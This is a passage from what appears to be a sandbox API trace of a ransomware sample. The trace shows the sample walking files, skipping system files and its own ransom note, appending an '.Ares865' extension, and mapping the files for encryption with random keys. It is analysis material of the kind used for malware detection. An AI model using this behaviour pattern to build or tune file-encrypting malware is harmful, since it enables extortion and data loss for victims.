dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x470) returned 0x190000 [0083.543] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.544] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.544] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.544] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.544] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.544] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.544] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.544] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.544] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.544] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0083.545] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.545] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0083.545] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.545] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.545] CloseHandle (hObject=0x15c) returned 1 [0083.545] CloseHandle (hObject=0x118) returned 1 [0083.545] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.545] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.545] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.545] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.SETLANG.14.1033.hxn", cAlternateFileName="MSSETL~1.HXN")) returned 1 [0083.545] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.545] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.545] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2=".") returned 1 [0083.545] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="..") returned 1 [0083.545] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="windows") returned -1 [0083.545] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.545] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="temp") returned -1 [0083.545] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.545] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="boot") returned 1 [0083.545] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.545] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.545] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="perflogs") returned -1 [0083.545] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.545] lstrlenW (lpString="MS.SETLANG.14.1033.hxn") returned 22 [0083.545] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn") returned 61 [0083.545] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.SETLANG.14.1033.hxn" | out: lpString1="MS.SETLANG.14.1033.hxn") returned="MS.SETLANG.14.1033.hxn" [0083.546] lstrlenW (lpString="MS.SETLANG.14.1033.hxn") returned 22 [0083.546] lstrlenW (lpString="Ares865") returned 7 [0083.546] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.546] lstrlenW (lpString=".dll") returned 4 [0083.546] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2=".dll") returned 1 [0083.546] lstrlenW (lpString=".lnk") returned 4 [0083.546] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2=".lnk") returned 1 [0083.546] lstrlenW (lpString=".ini") returned 4 [0083.546] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2=".ini") returned 1 [0083.546] lstrlenW (lpString=".sys") returned 4 [0083.546] lstrcmpiW (lpString1="MS.SETLANG.14.1033.hxn", lpString2=".sys") returned 1 [0083.546] lstrlenW (lpString="MS.SETLANG.14.1033.hxn") returned 22 [0083.546] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.Ares865") returned 64 [0083.546] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.547] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.547] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=338) returned 1 [0083.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.548] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.548] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.548] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.548] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.549] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x15c [0083.550] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0x190000 [0083.551] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.552] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.552] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0083.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0083.552] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.552] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.553] CloseHandle (hObject=0x15c) returned 1 [0083.553] CloseHandle (hObject=0x118) returned 1 [0083.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.553] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.553] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x5269fec0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO.14.1033.hxn", cAlternateFileName="MSVISI~1.HXN")) returned 1 [0083.553] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.553] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.553] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2=".") returned 1 [0083.553] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="..") returned 1 [0083.553] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="windows") returned -1 [0083.553] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.553] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="temp") returned -1 [0083.553] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.553] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="boot") returned 1 [0083.553] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.553] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.553] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="perflogs") returned -1 [0083.553] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.553] lstrlenW (lpString="MS.VISIO.14.1033.hxn") returned 20 [0083.553] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned 56 [0083.553] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.VISIO.14.1033.hxn" | out: lpString1="MS.VISIO.14.1033.hxn") returned="MS.VISIO.14.1033.hxn" [0083.553] lstrlenW (lpString="MS.VISIO.14.1033.hxn") returned 20 [0083.553] lstrlenW (lpString="Ares865") returned 7 [0083.553] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.553] lstrlenW (lpString=".dll") returned 4 [0083.553] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2=".dll") returned 1 [0083.553] lstrlenW (lpString=".lnk") returned 4 [0083.554] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2=".lnk") returned 1 [0083.554] lstrlenW (lpString=".ini") returned 4 [0083.554] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2=".ini") returned 1 [0083.554] lstrlenW (lpString=".sys") returned 4 [0083.554] lstrcmpiW (lpString1="MS.VISIO.14.1033.hxn", lpString2=".sys") returned 1 [0083.554] lstrlenW (lpString="MS.VISIO.14.1033.hxn") returned 20 [0083.554] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.Ares865") returned 62 [0083.554] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.556] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.556] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=326) returned 1 [0083.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.556] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.556] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.557] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.557] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.557] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x450, lpName=0x0) returned 0x15c [0083.559] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x450) returned 0x190000 [0083.560] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.560] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.560] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.560] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.560] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.561] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.561] CloseHandle (hObject=0x15c) returned 1 [0083.561] CloseHandle (hObject=0x118) returned 1 [0083.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.561] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.561] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x527122e0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO.DEV.14.1033.hxn", cAlternateFileName="MSVISI~3.HXN")) returned 1 [0083.561] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.561] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.561] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2=".") returned 1 [0083.561] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="..") returned 1 [0083.561] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="windows") returned -1 [0083.561] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.561] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="temp") returned -1 [0083.561] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.561] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="boot") returned 1 [0083.561] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.562] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.562] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="perflogs") returned -1 [0083.562] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.562] lstrlenW (lpString="MS.VISIO.DEV.14.1033.hxn") returned 24 [0083.562] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned 54 [0083.562] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.VISIO.DEV.14.1033.hxn" | out: lpString1="MS.VISIO.DEV.14.1033.hxn") returned="MS.VISIO.DEV.14.1033.hxn" [0083.562] lstrlenW (lpString="MS.VISIO.DEV.14.1033.hxn") returned 24 [0083.562] lstrlenW (lpString="Ares865") returned 7 [0083.562] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.562] lstrlenW (lpString=".dll") returned 4 [0083.562] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2=".dll") returned 1 [0083.562] lstrlenW (lpString=".lnk") returned 4 [0083.562] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2=".lnk") returned 1 [0083.562] lstrlenW (lpString=".ini") returned 4 [0083.562] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2=".ini") returned 1 [0083.562] lstrlenW (lpString=".sys") returned 4 [0083.562] lstrcmpiW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2=".sys") returned 1 [0083.562] lstrlenW (lpString="MS.VISIO.DEV.14.1033.hxn") returned 24 [0083.562] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.Ares865") returned 66 [0083.562] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.563] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.563] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=350) returned 1 [0083.564] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.564] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.564] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.564] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x15c [0083.574] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0x190000 [0083.574] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.575] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.575] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.576] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.Ares865") returned 73 [0083.576] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.577] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.577] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=392) returned 1 [0083.578] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.578] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.578] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.579] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x490, lpName=0x0) returned 0x15c [0083.581] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x490) returned 0x190000 [0083.581] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.582] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.582] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.583] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.Ares865") returned 66 [0083.583] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.584] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.584] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=350) returned 1 [0083.585] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.585] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.585] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.585] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x15c [0083.587] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0x190000 [0083.588] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.588] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.588] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.589] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.Ares865") returned 66 [0083.589] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.590] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.590] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=350) returned 1 [0083.590] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.591] CryptGenRandom (in: 